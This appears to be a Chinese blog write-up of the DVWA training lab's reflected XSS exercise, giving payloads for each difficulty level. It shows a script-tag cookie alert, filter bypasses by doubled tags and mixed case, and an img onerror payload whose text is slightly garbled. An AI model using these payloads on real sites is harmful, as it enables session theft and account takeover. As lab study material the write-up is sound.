热门标签
热门文章
- 1第11章 Tkinter 概述_51:/##y6h6ubdyl##1:/$wbsmkqt$11:/¥ubsd5akboofpxgpk
- 2记录在项目中引用本地的npm包
- 3html 列表标签 ul ol dl_html中dl自动编号
- 4ELF文件结构描述_、简述elf 文件的内部层次结构。
- 5Spring6详解-概述,入门
- 6flutter图片预览photo_view_flutter photo_view
- 7xcode6(ios8) 编译出现 CodeSign error_codesign error with: 2
- 8华为三层交换机 VLANIF 配置_vlanif的ip地址给谁配置的
- 9超详细的 K8s 高频面试题,绝对实用篇
- 10SAP ADM100-2.3 系统启动:AS ABAP和AS ABAP+JAVA_sap netweaver java administrator console
当前位置: article > 正文
DVWA的Xss跨站脚本攻击(反射型)_反射型xss攻击实例
作者:Monodyee | 2024-03-29 10:20:02
赞
踩
反射型xss攻击实例
目录
反射型
一、初级
1.先输入普通字符China,发现是原封不动的将我所输入的,完全输出了
2. 于是用<script>alert(/50zky/)</script> 浅试一下1
浅试成功!!
2)试着获取cookie <script>alert(document.cookie)</script>
获取成功!!!
二、中级
1.用原来的攻击手法发现,将script过滤掉了
2. 于是采用
1)双写绕过<scri<script>pt>alert(/50zky/)</script>
绕过成功!!
2)大写绕过<SCript>alert(/50zky/)</script>
成功绕过!!
三、高级
1. 发现中级用法,双写绕过和大写绕过都不行了将script的单个字符过滤了
2)于是我们不用<script>标签了<imgsrc=1οnerrοr=alert(/50zky/)>
攻击成功!!!
四、Impossible
级别1.发现它将所有的字符转换为HTML特殊字符了,之前的所有方法都不行了
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Monodyee/article/detail/335297
推荐阅读
相关标签
